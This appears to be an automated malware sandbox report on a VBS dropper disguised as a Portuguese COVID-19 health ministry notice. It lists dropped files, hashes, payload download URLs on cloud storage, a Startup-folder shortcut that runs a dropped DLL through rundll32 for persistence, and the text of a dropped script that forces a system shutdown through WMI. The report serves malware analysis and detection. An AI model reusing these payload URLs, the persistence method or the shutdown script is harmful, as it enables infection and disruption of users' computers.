          MD5:BC50209A431C05FA1E0D39FF8761073F
          SHA1:DFDE6CF89AEEC720A8515E40303BBB230B2C9D69
          SHA-256:EFD7057D2625E4F08EDD7427CF2C8A8FDD9DBAB724F3C648E10ED3EAE1E21C7F
          SHA-512:6CFB71B0075E7FFD71DE9F35876443C4F4C2F4240F4A2CAFE89FFE548BA670D4521824AF8F3341A29A040B07C891058349E44DDFA265EE8F04D0FE08436A5105
          Malicious:false
          Reputation:low
          IE Cache URL:https://storage.googleapis.com/mystorage2021/0.zip
          Preview: PK.........B$R.n...U..$Y.!..............q....z.iB4.I..|.w.f.|......tI.6Q..!...r@<a.4..n..Y.7t..\XR......}....i.............4}H|..iLb".....R...wu..!.t.Ny...;L...r.n.<n.\6H....&&G...B..9...e=j.-.$..DOI....Sp\5....Z.@..t ....F..F..2.B!..-.c...R..Q./......H5[.p|4...*wW..,.....~..D...G..j....In.....4T.....tf..A&....&k........g.. c....I..}F.Y.1......o..<..F.y%.... h.9...z@L'...{..........LE........].8.C.C.u..<\.C+>.....~.:.h.....".Z.A.~..T\...i...q.-.BE.G....4 _,..p....,....#.,.t.x-=..Ha....G../7.7.F........xk'K....4;XB~u5B+}.........C.~..d......-...J.....6.l...._$.01o..r..4..li.!.A...\.2.....Ph.......f2..}s>qOa....'.e...!r...E=R....b...|...&....0U...+...S;..:..g.0."K.B.f!ZqvA.U.P...p. ..V|..0m...~|.O.G.M^.....F'x.lJA.i.M...OH.h.!..|..........G._]....I.`8....3g..:.p...#..R.o..'..i.......=...G{..p...?Y...".p:......i....).......n./b..j1...1.CI.3..@2.N..j....^..=.G.u.$....-9...?..Z..<t.....K..f(^....(^.P.0.....
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dll
          Process:C:\Windows\System32\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:downloaded
          Size (bytes):128099840
          Entropy (8bit):7.999984870208901
          Encrypted:true
          SSDEEP:3145728:IcFFuqnqyx3j/QvjvZablwkXOczyC5rr1Tcal6M6T2:zwqnqqYviXXzX56f
          MD5:E1B2EC2857BDEDC4497655078946A20C
          SHA1:2DE9B015192D5F54370DCC1F5238F1CBA2245CE4
          SHA-256:E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
          SHA-512:5F4D3372A45FC334EF695041B3FC793350093210174FA2989B8A7D14D55263BBE6370B46ABA81D263E8A7DB89AF68748182E02E3C0FD99737D51E494A0A85A48
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Joe Sandbox View:
          • Filename: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs, Detection: malicious, Browse
          • Filename: Financeiro-JTQEFA-28-10-2020-167.vbs, Detection: malicious, Browse
          Reputation:low
          IE Cache URL:https://storage.googleapis.com/mystorage2021/P-16-5.dll
          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...E$._.................X&...j......[.......p&...@...........................E.............................................`.C.......E.X.....................E......................................................@......h\D......................text....>&......................... ..`.itext.......P&..................... ..`.data........p&.....................@....bss....tb...@'..........................idata...4....'.....................@....didata.h.....'.....................@....edata........(.....................@..@.rdata..E.....(.....................@..@.vmp0...1.z.. (.....................`..`.vmp1........ ......................`..`.reloc........E.....................@..@.rsrc...X.....E.....................@..@................
          C:\Users\user\AppData\Roaming\0.zip
          Process:C:\Windows\System32\wscript.exe
          File Type:Zip archive data, at least v2.0 to extract
          Category:dropped
          Size (bytes):5615495
          Entropy (8bit):7.999967059766371
          Encrypted:true
          SSDEEP:98304:Bh5gN8bU/nWlAULiFNZ6uOoslTKFFJA01YsodrEhKsf/gvVPuysUhB0:BkN8gfWlLo6uOoRFJZYrxsf/gxuy9u
          MD5:BC50209A431C05FA1E0D39FF8761073F
          SHA1:DFDE6CF89AEEC720A8515E40303BBB230B2C9D69
          SHA-256:EFD7057D2625E4F08EDD7427CF2C8A8FDD9DBAB724F3C648E10ED3EAE1E21C7F
          SHA-512:6CFB71B0075E7FFD71DE9F35876443C4F4C2F4240F4A2CAFE89FFE548BA670D4521824AF8F3341A29A040B07C891058349E44DDFA265EE8F04D0FE08436A5105
          Malicious:true
          Reputation:low
          Preview: PK.........B$R.n...U..$Y.!..............q....z.iB4.I..|.w.f.|......tI.6Q..!...r@<a.4..n..Y.7t..\XR......}....i.............4}H|..iLb".....R...wu..!.t.Ny...;L...r.n.<n.\6H....&&G...B..9...e=j.-.$..DOI....Sp\5....Z.@..t ....F..F..2.B!..-.c...R..Q./......H5[.p|4...*wW..,.....~..D...G..j....In.....4T.....tf..A&....&k........g.. c....I..}F.Y.1......o..<..F.y%.... h.9...z@L'...{..........LE........].8.C.C.u..<\.C+>.....~.:.h.....".Z.A.~..T\...i...q.-.BE.G....4 _,..p....,....#.,.t.x-=..Ha....G../7.7.F........xk'K....4;XB~u5B+}.........C.~..d......-...J.....6.l...._$.01o..r..4..li.!.A...\.2.....Ph.......f2..}s>qOa....'.e...!r...E=R....b...|...&....0U...+...S;..:..g.0."K.B.f!ZqvA.U.P...p. ..V|..0m...~|.O.G.M^.....F'x.lJA.i.M...OH.h.!..|..........G._]....I.`8....3g..:.p...#..R.o..'..i.......=...G{..p...?Y...".p:......i....).......n./b..j1...1.CI.3..@2.N..j....^..=.G.u.$....-9...?..Z..<t.....K..f(^....(^.P.0.....
          C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll
          Process:C:\Windows\System32\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):128099840
          Entropy (8bit):7.999984870208901
          Encrypted:true
          SSDEEP:3145728:IcFFuqnqyx3j/QvjvZablwkXOczyC5rr1Tcal6M6T2:zwqnqqYviXXzX56f
          MD5:E1B2EC2857BDEDC4497655078946A20C
          SHA1:2DE9B015192D5F54370DCC1F5238F1CBA2245CE4
          SHA-256:E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
          SHA-512:5F4D3372A45FC334EF695041B3FC793350093210174FA2989B8A7D14D55263BBE6370B46ABA81D263E8A7DB89AF68748182E02E3C0FD99737D51E494A0A85A48
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Joe Sandbox View:
          • Filename: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs, Detection: malicious, Browse
          • Filename: Financeiro-JTQEFA-28-10-2020-167.vbs, Detection: malicious, Browse
          Reputation:low
          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...E$._.................X&...j......[.......p&...@...........................E.............................................`.C.......E.X.....................E......................................................@......h\D......................text....>&......................... ..`.itext.......P&..................... ..`.data........p&.....................@....bss....tb...@'..........................idata...4....'.....................@....didata.h.....'.....................@....edata........(.....................@..@.rdata..E.....(.....................@..@.vmp0...1.z.. (.....................`..`.vmp1........ ......................`..`.reloc........E.....................@..@.rsrc...X.....E.....................@..@................
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm .lnk
          Process:C:\Windows\System32\wscript.exe
          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
          Category:dropped
          Size (bytes):1104
          Entropy (8bit):3.5081862049592
          Encrypted:false
          SSDEEP:24:8q/BuUl++fClb2yjCyjM47zRSESd57aB:8mwUl8lbXCyjMcB
          MD5:EFF6667494E9C529A0189BA4FDD93E51
          SHA1:1269792565D3E2869BF58B4F0EAFD9E8BAD576CF
          SHA-256:0D32724BFFDE1EEE5CC0524407FD74BCF2714E5BA5875EFBE533ED2F9FE60907
          SHA-512:230741710EEDEFD4A226E4C172823BB98061CF5B0EA91F7446172742B889F0EA48D724F0039BDF886ABFEEFAB67CFFBC9F4879CC53B669027022095A9396B6C3
          Malicious:true
          Reputation:low
          Preview: L..................F........................................................E....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........system32..B............................................s.y.s.t.e.m.3.2.....f.2...........rundll32.exe..J............................................r.u.n.d.l.l.3.2...e.x.e.......8.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e.X.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.t.g.w.p.x.y.o.h.q.m.g. .C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.6.4.3.1.7.5.8.3.2.0.3.3.1.5.\.w.k.o.y.r.p.h.e.b.h.x.o.n.p.i.m.m.6.0.6.0.2.9.2.7.0.2.9.1.3.2...d.l.l. .S.F.s.b.9.V.5.o.7.L.T.f.x.D.W.h.D.o.h.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.
          C:\Users\user\AppData\Roaming\phewmqhjwxh.vbs
          Process:C:\Windows\System32\wscript.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):310
          Entropy (8bit):5.319824431104741
          Encrypted:false
          SSDEEP:6:jVtyYdqhNGXIkKnFkjqvAATbKZkXOyMz6gCggPsjJRXvexOvXKgIi8Ny:ZEYYhNGYkKnFPvAOKZy8MHsjJRvyOdB
          MD5:C5394303848978B05D041057E051124B
          SHA1:DCF334238967DB0ACE42ACEB5445416259687223
          SHA-256:D346B18223E32677DC656E18BF328AE441E7EB65CFF935EC8F51562844E1528B
          SHA-512:7B07418EAD76B9460B02D5A543C3C1761128C5FF9BCCC68BF499E21353F4F0720B0313669DA509F8D220D36FEB089D5B8F5DFF49609D36319FBBA1031CFFD684
          Malicious:true
          Reputation:low
          Preview: Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")..WScript.Sleep(300000)..Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _..& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_..& "Primary=true")..for each OpSys in OpSysSet..retVal = OpSys.Win32Shutdown(6)..next..

          Static File Info

          General

          File type:UTF-8 Unicode text, with CRLF line terminators
          Entropy (8bit):5.770759521169668
          TrID:
          • Visual Basic Script (13500/0) 100.00%
          File name:Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
          File size:276876
          MD5:462d612fcc6ce92ac4d1b58a27e4ecac
          SHA1:405633f2a4fe5b859ea9331a2276ebd494d39aa4
          SHA256:2bedcf94c9aea7b126f70169728f38678d615cdc26991c3b30628912eb2766d9
          SHA512:0b6b80bfa5d90209a0521f6610c38f07d4c868e2436df5e6acdaa804d4bd700cc6272d683dc0f2036f4e83e7fdb3a24cccd384db3f5fa872a4a97079c5dba08d
          SSDEEP:6144:1zxUzx/zx2zxKzxQzxLzx6zxQzx3zxAzxyzx6zxjzxrzxzzx8zx4zxqzx8zxszxM:1lUl/l2lKlQlLl6lQl3lAlyl6ljlrlzL
          File Content Preview:'Qr..2..Llv6...........GE..b......lnYLGHq...JO.......h...H...JU..RYFi..V2H..........gU...X.....GjRZv.........nV...n..zp..2..4I.....xOK...n..........0........at....'5...e..........xy...........mnrZR......GjnEY0hFj1.....6..S..............YnJcsnEX...UoVt....

          File Icon

          Icon Hash:e8d69ece869a9ec4

          Network Behavior

          No network behavior found

          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          System Behavior

          General

          Start time:18:57:09
          Start date:12/01/2021
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs'
          Imagebase:0x7ff79c460000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Disassembly

          Code Analysis

          Reset < >